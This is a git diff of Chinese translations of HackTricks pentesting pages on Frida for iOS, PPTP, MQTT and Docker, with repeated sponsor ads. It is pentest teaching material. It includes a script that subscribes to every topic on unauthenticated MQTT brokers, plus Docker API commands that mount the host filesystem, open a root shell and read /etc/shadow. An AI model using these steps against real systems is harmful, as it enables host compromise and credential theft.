- [使用JEB反编译器调试Android本地库](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
### [WhiteIntel](https://whiteintel.io)
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>

78
mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md
View file

@ -6,17 +6,17 @@
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 如果您想看到您的**公司在HackTricks中广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
@ -33,7 +33,7 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
**在越狱设备上安装Frida的步骤**
1. 打开Cydia/Sileo应用。
2. 导航至管理 -> 源 -> 编辑 -> 添加。
2. 转到管理 -> 源 -> 编辑 -> 添加。
3. 输入"https://build.frida.re"作为URL。
4. 转到新添加的Frida源。
5. 安装Frida软件包。
@ -41,7 +41,7 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
如果您使用**Corellium**,您需要从[https://github.com/frida/frida/releases](https://github.com/frida/frida/releases)下载Frida版本`frida-gadget-[yourversion]-ios-universal.dylib.gz`并解压缩并复制到Frida要求的dylib位置例如`/Users/[youruser]/.cache/frida/gadget-ios.dylib`
安装后您可以在PC上使用命令**`frida-ls-devices`**并检查设备是否显示您的PC需要能够访问它。\
执行**`frida-ps -Uia`**来检查手机的运行进程。
可以执行**`frida-ps -Uia`**来检查手机的运行进程。
## 无需越狱设备和无需修补应用程序的Frida
@ -54,7 +54,7 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
pip install frida-tools
pip install frida
```
安装了Frida服务器并连接设备后**检查**客户端是否**运行**
安装了Frida服务器并连接设备后**检查**客户端是否**正常工作**
```bash
frida-ls-devices # List devices
frida-ps -Uia # Get running processes
@ -105,7 +105,7 @@ console.log("Objective-C runtime is not available.");
```
{% endcode %}
* 获取一个类的所有方法(通过字符串过滤)
* 获取类的所有方法(按字符串过滤)
{% code title="/tmp/script.js" %}
```javascript
@ -171,7 +171,7 @@ console.log("loaded");
您可以在[https://github.com/poxyran/misc/blob/master/frida-stalker-example.py](https://github.com/poxyran/misc/blob/master/frida-stalker-example.py)找到一个实现Frida Stalker的示例。
这是另一个示例每次调用函数时附加Frida Stalker的示例
这是另一个示例每次调用函数时附加Frida Stalker
```javascript
console.log("loading");
const wg_log_addr = Module.findExportByName("<Program>", "<function_name>");
@ -306,7 +306,7 @@ rpc.exports.fuzzer = f;
```
{% endcode %}
* **编译** fuzzer
* **编译** fuzzer:
```bash
# From inside fpicker clone
## Compile from "myfuzzer.js" to "harness.js"
@ -323,18 +323,18 @@ fpicker -v --fuzzer-mode active -e attach -p <Program to fuzz> -D usb -o example
{% endcode %}
{% hint style="danger" %}
在这种情况下,我们在每个有效负载之后**不重新启动应用程序或恢复状态**。因此如果Frida发现一个**崩溃**,那么在该有效负载之后的**下一个输入**可能也会**导致应用程序崩溃**(因为应用程序处于不稳定状态),即使**输入不应导致**应用程序崩溃。
在这种情况下,我们在每个有效负载之后**不重新启动应用程序或恢复状态**。因此,如果 Frida 发现一个**崩溃**,那么在该有效负载之后的**下一个输入**可能也会**导致应用程序崩溃**(因为应用程序处于不稳定状态),即使**输入不应导致**应用程序崩溃。
此外Frida将钩入iOS的异常信号因此当**Frida发现崩溃**时,可能**不会生成iOS崩溃报告**。
此外Frida 将钩入 iOS 的异常信号,因此当**Frida 发现崩溃**时,可能**不会生成 iOS 崩溃报告**。
为了防止这种情况例如我们可以在每次Frida崩溃后重新启动应用程序。
为了防止这种情况,例如,我们可以在每次 Frida 崩溃后重新启动应用程序。
{% endhint %}
### 日志和崩溃
您可以检查**macOS控制台**或**`log`** cli来查看macOS日志。\
您还可以使用**`idevicesyslog`**来检查iOS的日志。\
一些日志会省略添加**`<private>`**的信息。要显示所有信息,您需要从[https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/)安装一些配置文件以启用私人信息。
您可以检查**macOS 控制台**或**`log`** cli 来查看 macOS 日志。\
您还可以使用**`idevicesyslog`**来检查 iOS 的日志。\
一些日志会省略添加**`<private>`**的信息。要显示所有信息,您需要安装一些配置文件,从[https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/)下载以启用私人信息。
如果您不知道该怎么办:
```sh
@ -350,53 +350,53 @@ vim /Library/Preferences/Logging/com.apple.system.logging.plist
killall -9 logd
```
You can check the crashes in:
您可以在以下位置检查崩溃情况:
* **iOS**
* Settings → Privacy → Analytics & Improvements → Analytics Data
* `/private/var/mobile/Library/Logs/CrashReporter/`
* **macOS**:
* `/Library/Logs/DiagnosticReports/`
* `~/Library/Logs/DiagnosticReports`
- **iOS**
- 设置 → 隐私 → 分析与改进 → 分析数据
- `/private/var/mobile/Library/Logs/CrashReporter/`
- **macOS**:
- `/Library/Logs/DiagnosticReports/`
- `~/Library/Logs/DiagnosticReports`
{% hint style="warning" %}
iOS only stores 25 crashes of the same app, so you need to clean that or iOS will stop creating crashes.
iOS仅存储同一应用的25个崩溃情况因此您需要清理否则iOS将停止创建崩溃报告。
{% endhint %}
## Frida Android Tutorials
## Frida Android 教程
{% content-ref url="../android-app-pentesting/frida-tutorial/" %}
[frida-tutorial](../android-app-pentesting/frida-tutorial/)
{% endcontent-ref %}
## References
## 参考资料
* [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida)
- [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
You can check their website and try their engine for **free** at:
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
Other ways to support HackTricks:
支持HackTricks的其他方式
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
- 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>

30
network-services-pentesting/1723-pentesting-pptp.md
View file

@ -1,26 +1,26 @@
# 1723 - 渗透测试 PPTP
# 1723 - PPTP渗透测试
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
支持 HackTricks 的其他方式:
支持HackTricks的其他方式
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord **](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** 上关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -30,7 +30,7 @@ WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户劫
## 基本信息
**点对点隧道协议PPTP** 是一种广泛用于**远程访问**移动设备的方法。它利用**TCP 端口 1723**来交换密钥,而**IP 协议 47**(通用路由封装,或**GRE**)用于加密对等方之间传输的数据。这种设置对于在互联网上建立安全通信通道至关重要,确保交换的数据保持机密,并受到未经授权的访问保护。
**点对点隧道协议PPTP**是一种广泛用于**远程访问**移动设备的方法。它利用**TCP端口1723**进行密钥交换,而**IP协议47**(通用路由封装,或**GRE**)用于加密对等方之间传输的数据。这种设置对于在互联网上建立安全通信通道至关重要,确保交换的数据保持机密,并受到未经授权的访问保护。
**默认端口**1723
@ -46,11 +46,11 @@ nmap Pn -sSV -p1723 <IP>
<details>
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

28
network-services-pentesting/1883-pentesting-mqtt-mosquitto.md
View file

@ -2,21 +2,21 @@
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
@ -39,9 +39,9 @@ PORT STATE SERVICE REASON
```
## 检查流量
当 MQTT 代理接收到 **CONNECT** 数据包时,会发送回一个 **CONNACK** 数据包。这个数据包包含一个返回码,对于理解连接状态至关重要。返回码 **0x00** 表示凭据已被接受,表连接成功。另一方面,返回码 **0x05** 表示凭据无效,从而阻止连接。
当 MQTT 代理接收到 **CONNECT** 数据包时,会发送回一个 **CONNACK** 数据包。数据包包含一个返回码,对于理解连接状态至关重要。返回码 **0x00** 表示凭据已被接受,表连接成功。另一方面,返回码 **0x05** 表示凭据无效,从而阻止连接。
例如,如果代理因为凭据无效而拒绝连接,情景会如下所示:
例如,如果代理因凭据无效而拒绝连接,则场景会如下所示:
```
{
"returnCode": "0x05",
@ -68,7 +68,7 @@ apt-get install mosquitto mosquitto-clients
mosquitto_sub -t 'test/topic' -v #Subscribe to 'test/topic'
mosquitto_sub -h <host-ip> -t "#" -v #Subscribe to ALL topics.
```
或者您可以**运行此代码尝试连接到一个没有身份验证的MQTT服务订阅每个主题并监听它们**
或者您可以运行此代码尝试连接到一个没有身份验证的MQTT服务订阅每个主题并监听它们
```python
#This is a modified version of https://github.com/Warflop/IOT-MQTT-Exploit/blob/master/mqtt.py
import paho.mqtt.client as mqtt
@ -125,9 +125,9 @@ main()
- PUBREC5消息传递协议的一部分确保消息已接收。
- PUBREL6进一步确保消息传递指示消息释放。
- PUBCOMP7消息传递协议的最后部分指示完成。
- SUBSCRIBE8客户端请求从主题接收消息。
- SUBSCRIBE8客户端请求从一个主题接收消息。
- SUBACK9服务器对 SUBSCRIBE 请求的确认。
- UNSUBSCRIBE10客户端请求停止从主题接收消息。
- UNSUBSCRIBE10客户端请求停止从一个主题接收消息。
- UNSUBACK11服务器对 UNSUBSCRIBE 请求的响应。
- PINGREQ12客户端发送的心跳消息。
- PINGRESP13服务器对心跳消息的响应。
@ -138,13 +138,13 @@ main()
- `port:1883 MQTT`
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否已受到**窃取恶意软件**的侵害
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**推动的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**威胁**
WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由窃取信息的恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:

74
network-services-pentesting/2375-pentesting-docker.md
View file

@ -6,19 +6,19 @@
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT收藏品](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
@ -32,15 +32,15 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
#### 什么是Docker
Docker是**容器化行业**中的**前沿平台**,引领**持续创新**。它便于轻松创建和分发应用程序,涵盖**传统到未来**的范围,并确保它们在不同环境中的**安全部署**。
Docker是**容器化行业**中的**前沿平台**,引领**持续创新**。它便于创建和分发应用程序,涵盖**传统到未来**的范围,并确保它们在不同环境中的**安全部署**。
#### 基本Docker架构
* [**containerd**](http://containerd.io):这是容器的**核心运行时**,负责全面**管理容器的生命周期**。这包括处理**镜像传输和存储**,以及监视和网络容器的**执行**。对containerd的**更详细见解**将进一步探讨。
* **容器shim**在处理**无头容器**时发挥关键作用,它在容器初始化后无缝接管**runc**的工作。
* [**runc**](http://runc.io):以其**轻量级和通用容器运行时**功能而闻名runc符合**OCI标准**。它由containerd用于根据**OCI指南**启动和管理容器,从最初的**libcontainer**发展而来。
* [**grpc**](http://www.grpc.io)对于在containerd和**docker引擎**之间**促进通信**至关重要,确保**高效互动**。
* [**OCI**](https://www.opencontainers.org)在维护运行时和镜像的**OCI规范**方面至关重要最新的Docker版本符合**OCI镜像和运行时**标准。
- [**containerd**](http://containerd.io):这是容器的**核心运行时**,负责全面**管理容器的生命周期**。这包括处理**镜像传输和存储**,以及监视和网络容器的**执行**。对containerd的**更详细见解**将**进一步探讨**
- **container-shim**在处理**无头容器**时发挥关键作用,它在容器初始化后无缝接管**runc**的工作。
- [**runc**](http://runc.io):以其**轻量级和通用容器运行时**功能而闻名runc符合**OCI标准**。它由containerd用于根据**OCI指南**启动和管理容器,从最初的**libcontainer**发展而来。
- [**grpc**](http://www.grpc.io)对于在containerd和**docker-engine**之间**促进通信**至关重要,确保**高效互动**。
- [**OCI**](https://www.opencontainers.org)在维护运行时和镜像的**OCI规范**方面至关重要最新的Docker版本符合**OCI镜像和运行时**标准。
#### 基本命令
```bash
@ -67,9 +67,9 @@ docker system prune -a
```
#### Containerd
**Containerd**是专门为像**Docker和Kubernetes**等容器平台的需求而开发的。它旨在通过抽象操作系统特定功能和系统调用简化在各种操作系统包括Linux、Windows、Solaris等上执行容器的过程。Containerd的目标是仅包含其用户所需的基本功能力省略不必要的组件。然而,完全实现这一目标被认为是具有挑战性的。
**Containerd**是专门为像**Docker和Kubernetes**等容器平台开发的。它旨在通过抽象操作系统特定功能和系统调用简化在各种操作系统包括Linux、Windows、Solaris等上执行容器的过程。Containerd的目标是仅包含其用户所需的基本功能省略不必要的组件。然而,完全实现这一目标被认为是具有挑战性的。
一个关键的设计决是**Containerd不处理网络**。网络被认为是分布式系统中的一个关键元素具有诸如软件定义网络SDN和服务发现等复杂性这些复杂性在不同平台之间差异很大。因此Containerd将网络方面的处理留给了它支持的平台来管理
一个关键的设计决是**Containerd不处理网络**。网络被认为是分布式系统中的一个关键元素具有诸如软件定义网络SDN和服务发现等复杂性这些复杂性在不同平台之间差异很大。因此Containerd将网络方面的管理留给了它支持的平台
虽然**Docker利用Containerd**来运行容器但重要的是要注意Containerd仅支持Docker功能的子集。具体来说Containerd缺乏Docker中存在的网络管理功能并且不直接支持创建Docker swarms。这种区别突显了Containerd作为容器运行时环境的专注角色将更专业的功能委托给其集成的平台。
```bash
@ -89,15 +89,15 @@ ctr container delete <containerName>
```
#### Podman
**Podman** 是一个遵循[开放容器倡议OCI标准](https://github.com/opencontainers)的开源容器引擎,由 Red Hat 开发和维护。它与 Docker 有几个明显的特点不同,尤其是其**无守护程序架构**和对**无根容器**的支持,使用户能够在无需 root 权限的情况下运行容器。
**Podman** 是一个遵循[开放容器倡议OCI标准](https://github.com/opencontainers)的开源容器引擎,由 Red Hat 开发和维护。它与 Docker 有几个明显的特点不同,尤其是其**无守护程序架构**和对**无根权限容器**的支持,使用户能够在无需 root 权限的情况下运行容器。
Podman 的设计旨在与 Docker 的 API 兼容,允许使用 Docker CLI 命令。这种兼容性延伸到其生态系统,其中包括诸如**Buildah**(用于构建容器镜像)和**Skopeo**(用于推送、拉取和检查镜像等操作)等工具。有关这些工具的更多详细信息,请参阅它们的[GitHub 页面](https://github.com/containers/buildah/tree/master/docs/containertools)。
**主要区别**
- **架构**:与 Docker 的客户端-服务器模型及后台守护程序不同Podman 无需守护程序运行。这种设计意味着容器以启动它们的用户的权限运行,通过消除对 root 访问的需求来增强安全性。
- **架构**:与 Docker 的客户端-服务器模型及后台守护程序不同Podman 无需守护程序运行。这种设计意味着容器以启动它们的用户的权限运行,通过消除对 root 访问权限的需求来增强安全性。
- **Systemd 集成**Podman 与 **systemd** 集成以管理容器,允许通过 systemd 单元进行容器管理。这与 Docker 主要用于管理 Docker 守护程序进程的 systemd 的用法形成对比。
- **无根容器**Podman 的一个关键特点是能够以启动用户的权限运行容器。这种方法通过确保攻击者仅获得受损用户的权限而非 root 访问,最小化了与容器入侵相关的风险。
- **无根权限容器**Podman 的一个关键特点是能够以启动用户的权限运行容器。这种方法通过确保攻击者仅获得受损用户的权限而非 root 访问权限,最小化了与容器入侵相关的风险。
Podman 的方法为 Docker 提供了一个安全灵活的替代方案,强调用户权限管理和与现有 Docker 工作流的兼容性。
@ -109,11 +109,13 @@ podman info
pdoman images ls
podman ls
```
{% endhint %}
### 基本信息
当启用时,远程 API 默认在 2375 端口上运行。默认情况下,该服务不需要身份验证,允许攻击者启动一个特权的 Docker 容器。通过使用远程 API可以将主机/(根目录)附加到容器,并读取/写入主机环境中的文件。
当启用时,默认情况下远程 API 在 2375 端口上运行。默认情况下,该服务不需要身份验证,允许攻击者启动一个特权的 Docker 容器。通过使用远程 API可以将主机/(根目录)附加到容器,并读取/写入主机环的文件。
**默认端口** 2375
**默认端口:** 2375
```
PORT STATE SERVICE
2375/tcp open docker
@ -158,7 +160,7 @@ docker-init:
Version: 0.18.0
GitCommit: fec3683
```
如果您可以使用`docker`命令**联系远程docker API**,您可以**执行**任何**之前评论过的docker** [**命令**](2375-pentesting-docker.md#basic-commands) 来与服务进行交互。
如果您可以使用`docker`命令**联系远程docker API**,您可以执行任何在[**之前评论过的docker命令**](2375-pentesting-docker.md#basic-commands)来与服务进行交互。
{% hint style="info" %}
您可以`export DOCKER_HOST="tcp://localhost:2375"`**避免**在docker命令中使用`-H`参数
@ -170,7 +172,7 @@ docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash
```
**Curl**
有时你会看到 **2376** 开放**TLS** 端点。我无法用 docker 客户端连接到它,但可以使用 curl。
有时你会看到 **2376** 开放**TLS** 端点上。我无法用 docker 客户端连接到它,但可以使用 curl 连接
```bash
#List containers
curl insecure https://tlsopen.docker.socket:2376/containers/json | jq
@ -207,7 +209,7 @@ curl insecure -vv -X POST -H "Content-Type: application/json" https://tls-ope
msf> use exploit/linux/http/docker_daemon_tcp
nmap -sV --script "docker-*" -p <PORT> <IP>
```
### 入侵
### Compromising
在以下页面,您可以找到**从 Docker 容器中逃脱**的方法:
@ -226,18 +228,18 @@ cat /mnt/etc/shadow
